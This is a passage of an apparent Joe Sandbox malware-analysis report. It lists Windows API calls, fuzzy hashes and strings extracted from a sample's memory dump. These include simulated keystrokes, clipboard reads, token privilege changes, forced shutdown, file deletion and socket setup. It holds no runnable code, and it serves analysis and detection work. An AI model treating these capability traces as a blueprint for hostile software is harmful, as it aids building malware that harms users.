                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00F143A8
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F143BE
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F143C5
                                                                                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00F143D1
                                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F143E2
                                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F143EA
                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F143F2
                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00F143F5
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1440A
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00F14415
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1441F
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00F14424
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1442D
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00F14432
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1443C
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00F14441
                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00F14444
                                                                                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00F1446B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                                  • Opcode ID: 3ea94a84ed06ee9f4101a0ef0604357cc2193d763b497d6973f144c612c871c2
                                                                                                                                  • Instruction ID: 240b95368f40b86d377b8196e683c3b4341a31253275e260e8fd299a813f0eaf
                                                                                                                                  • Opcode Fuzzy Hash: 3ea94a84ed06ee9f4101a0ef0604357cc2193d763b497d6973f144c612c871c2
                                                                                                                                  • Instruction Fuzzy Hash: D2315471A4021CBBEB315B719C4AFBF7E6CEB84B50F114025FA05EA1D1C6B06D42BEA1
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00EA31DA
                                                                                                                                    • Part of subcall function 00EE7B9F: __wsplitpath.LIBCMT ref: 00EE7BBC
                                                                                                                                    • Part of subcall function 00EE7B9F: __wsplitpath.LIBCMT ref: 00EE7BCF
                                                                                                                                    • Part of subcall function 00EE7C0C: GetFileAttributesW.KERNEL32(?,00EE6A7B), ref: 00EE7C0D
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6B9D
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6BBB
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EE6BE2
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00EE6BF8
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EE6C57
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6C6A
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6C7D
                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00EE6CAB
                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00EE6CBC
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00EE6CDB
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00EE6CEA
                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00EE6CFF
                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00EE6D10
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EE6D37
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EE6D53
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EE6D61
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 1867810238-1173974218
                                                                                                                                  • Opcode ID: 9fe1135cbfe549182484a5bc94a77f3d706ad6a6b899c123ed243e9faef7d4bf
                                                                                                                                  • Instruction ID: dd0ace52a60a56795515f7ed21bbad459edd5ad8c1258c647101184292155c2c
                                                                                                                                  • Opcode Fuzzy Hash: 9fe1135cbfe549182484a5bc94a77f3d706ad6a6b899c123ed243e9faef7d4bf
                                                                                                                                  • Instruction Fuzzy Hash: F7516E7290025CAADF21EBA1CC84EEE77BCAF19344F4455DAE549B3041EB319B89CF61
                                                                                                                                  APIs
                                                                                                                                  • OpenClipboard.USER32(00F3DBF0), ref: 00EF70C3
                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EF70D1
                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00EF70D9
                                                                                                                                  • CloseClipboard.USER32 ref: 00EF70E5
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00EF7101
                                                                                                                                  • CloseClipboard.USER32 ref: 00EF710B
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00EF7120
                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00EF712D
                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00EF7135
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00EF7142
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00EF7176
                                                                                                                                  • CloseClipboard.USER32 ref: 00EF7283
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3222323430-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EDBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EDBF0F
                                                                                                                                    • Part of subcall function 00EDBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EDBF3C
                                                                                                                                    • Part of subcall function 00EDBEC3: GetLastError.KERNEL32 ref: 00EDBF49
                                                                                                                                  • _memset.LIBCMT ref: 00EDBA34
                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EDBA86
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00EDBA97
                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EDBAAE
                                                                                                                                  • GetProcessWindowStation.USER32 ref: 00EDBAC7
                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00EDBAD1
                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EDBAEB
                                                                                                                                    • Part of subcall function 00EDB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EDB9EC), ref: 00EDB8C5
                                                                                                                                    • Part of subcall function 00EDB8B0: CloseHandle.KERNEL32(?,?,00EDB9EC), ref: 00EDB8D7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                  • String ID: $default$winsta0
                                                                                                                                  • API String ID: 2063423040-1027155976
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EF2065
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF207A
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF2091
                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00EF20A3
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00EF20BD
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00EF20D5
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EF20E0
                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00EF20FC
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF2123
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF213A
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF214C
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00F53A68), ref: 00EF216A
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EF2174
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EF2181
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EF2191
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 1803514871-438819550
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00F0F14B
                                                                                                                                    • Part of subcall function 00F0D5EE: ClientToScreen.USER32(?,?), ref: 00F0D617
                                                                                                                                    • Part of subcall function 00F0D5EE: GetWindowRect.USER32(?,?), ref: 00F0D68D
                                                                                                                                    • Part of subcall function 00F0D5EE: PtInRect.USER32(?,?,00F0EB2C), ref: 00F0D69D
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00F0F1B4
                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F0F1BF
                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F0F1E2
                                                                                                                                  • _wcscat.LIBCMT ref: 00F0F212
                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F0F229
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00F0F242
                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00F0F259
                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00F0F27B
                                                                                                                                  • DragFinish.SHELL32(?), ref: 00F0F282
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00F0F36D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                  • API String ID: 2166380349-3440237614
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EF21C0
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF21D5
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF21EC
                                                                                                                                    • Part of subcall function 00EE7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EE7621
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00EF221B
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EF2226
                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00EF2242
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF2269
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF2280
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF2292
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00F53A68), ref: 00EF22B0
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EF22BA
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EF22C7
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EF22D7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 1824444939-438819550
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove_memset
                                                                                                                                  • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                  • API String ID: 3555123492-286096704
                                                                                                                                  • Opcode ID: 2329352d89e44b102a20b71b2f4761ba895bf4a25f15be1f7fc129d9428106ba
                                                                                                                                  • Instruction ID: 526593adacd7efcffa773a90319d47750bb2db87e80fb5d34de7037e29937215
                                                                                                                                  • Opcode Fuzzy Hash: 2329352d89e44b102a20b71b2f4761ba895bf4a25f15be1f7fc129d9428106ba
                                                                                                                                  • Instruction Fuzzy Hash: 5C729E72D04219CBDF24CF98C9906EDB7B1FF4A324F2981A9D855BB241D734AE81EB50
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F0ED0C
                                                                                                                                  • GetFocus.USER32 ref: 00F0ED1C
                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00F0ED27
                                                                                                                                  • _memset.LIBCMT ref: 00F0EE52
                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00F0EE7D
                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00F0EE9D
                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00F0EEB0
                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00F0EEE4
                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00F0EF2C
                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F0EF64
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00F0EF99
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 3616455698-4108050209
                                                                                                                                  • Opcode ID: 229a489a2fb463018fc93f17ef9abd1f88acd1603eb624dfd492dd60ccd1fcfa
                                                                                                                                  • Instruction ID: 23458c1060a4f01952f9d9f43b04267ea8e489ddfcbed3f1a4a2f5e0f39abf14
                                                                                                                                  • Opcode Fuzzy Hash: 229a489a2fb463018fc93f17ef9abd1f88acd1603eb624dfd492dd60ccd1fcfa
                                                                                                                                  • Instruction Fuzzy Hash: ED818F71609306AFD720DF14C885A6BBBE8FF88364F04092DF99597291D770D905FBA2
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EDB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EDB903
                                                                                                                                    • Part of subcall function 00EDB8E7: GetLastError.KERNEL32(?,00EDB3CB,?,?,?), ref: 00EDB90D
                                                                                                                                    • Part of subcall function 00EDB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00EDB3CB,?,?,?), ref: 00EDB91C
                                                                                                                                    • Part of subcall function 00EDB8E7: RtlAllocateHeap.NTDLL(00000000,?,00EDB3CB), ref: 00EDB923
                                                                                                                                    • Part of subcall function 00EDB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EDB93A
                                                                                                                                    • Part of subcall function 00EDB982: GetProcessHeap.KERNEL32(00000008,00EDB3E1,00000000,00000000,?,00EDB3E1,?), ref: 00EDB98E
                                                                                                                                    • Part of subcall function 00EDB982: RtlAllocateHeap.NTDLL(00000000,?,00EDB3E1), ref: 00EDB995
                                                                                                                                    • Part of subcall function 00EDB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EDB3E1,?), ref: 00EDB9A6
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EDB3FC
                                                                                                                                  • _memset.LIBCMT ref: 00EDB411
                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EDB430
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00EDB441
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00EDB47E
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EDB49A
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00EDB4B7
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EDB4C6
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00EDB4CD
                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EDB4EE
                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00EDB4F5
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EDB526
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EDB54C
                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EDB560
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2347767575-0
                                                                                                                                  • Opcode ID: eae91a8ae7356c863f0055de89925cb72d5863967ea0ba0c574639c4cedaef9f
                                                                                                                                  • Instruction ID: c556f4745c2121306f2103267e9a6446cb36a590a0f845733a4d10043ad64702
                                                                                                                                  • Opcode Fuzzy Hash: eae91a8ae7356c863f0055de89925cb72d5863967ea0ba0c574639c4cedaef9f
                                                                                                                                  • Instruction Fuzzy Hash: 14512A71900209EBDF14DFA4DC45AEEBBB9FF04304F14812AE915A62A1EB359A06DB60
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00EA31DA
                                                                                                                                    • Part of subcall function 00EE7C0C: GetFileAttributesW.KERNEL32(?,00EE6A7B), ref: 00EE7C0D
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6E7E
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EE6E99
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00EE6EAE
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EE6EDD
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6EEF
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6F01
                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00EE6F0E
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EE6F22
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EE6F3D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 2643075503-1173974218
                                                                                                                                  • Opcode ID: 76a04b8496ae76dd626c600e18db721b0cd715d7e93d709b30d1a220bf468085
                                                                                                                                  • Instruction ID: 1bed102c6dfb3fd4420f375b9c655bedf6a963963bd646e6a763fb9e1d043289
                                                                                                                                  • Opcode Fuzzy Hash: 76a04b8496ae76dd626c600e18db721b0cd715d7e93d709b30d1a220bf468085
                                                                                                                                  • Instruction Fuzzy Hash: 0321D172408388AEC210EFA0D8849DFBBDC9B99354F044A5EF5D4D3052EA30D60D87A2
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1737998785-0
                                                                                                                                  • Opcode ID: 337a62711f1805d94c316b0355c6b4a1cf359fc0273f4c9a9bc5c973e6a58a30
                                                                                                                                  • Instruction ID: 9f46f44544e369c09381a9b6f4d3a6c38c844f2ad5fc33efdc6f13dad9e5c663
                                                                                                                                  • Opcode Fuzzy Hash: 337a62711f1805d94c316b0355c6b4a1cf359fc0273f4c9a9bc5c973e6a58a30
                                                                                                                                  • Instruction Fuzzy Hash: B321C731205118AFDB24AF64DC59B6E7BE8FF44710F008019FA49EB2A1DB70ED42EB91
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EF24F6
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00EF2526
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF253A
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF2555
                                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00EF25F3
                                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00EF2609
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 713712311-438819550
                                                                                                                                  • Opcode ID: 2d035360a883cc93f61062c77e5de240b34fbbebb977886bb31ccafe2b228455
                                                                                                                                  • Instruction ID: 0047a76150bce475ebe2a9d32515f75cda37ac81460b4f86acf36eb28539bc35
                                                                                                                                  • Opcode Fuzzy Hash: 2d035360a883cc93f61062c77e5de240b34fbbebb977886bb31ccafe2b228455
                                                                                                                                  • Instruction Fuzzy Hash: 06418D7190021EAFCF14DFA4CC49AEEBBB4FF09314F20545AEA15B6191EB30AA44DF91
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                                  • API String ID: 0-1546025612
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EDBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EDBF0F
                                                                                                                                    • Part of subcall function 00EDBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EDBF3C
                                                                                                                                    • Part of subcall function 00EDBEC3: GetLastError.KERNEL32 ref: 00EDBF49
                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00EE830C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                                                                  • API String ID: 2234035333-194228
                                                                                                                                  APIs
                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EF9235
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF9244
                                                                                                                                  • bind.WS2_32(00000000,?,00000010), ref: 00EF9260
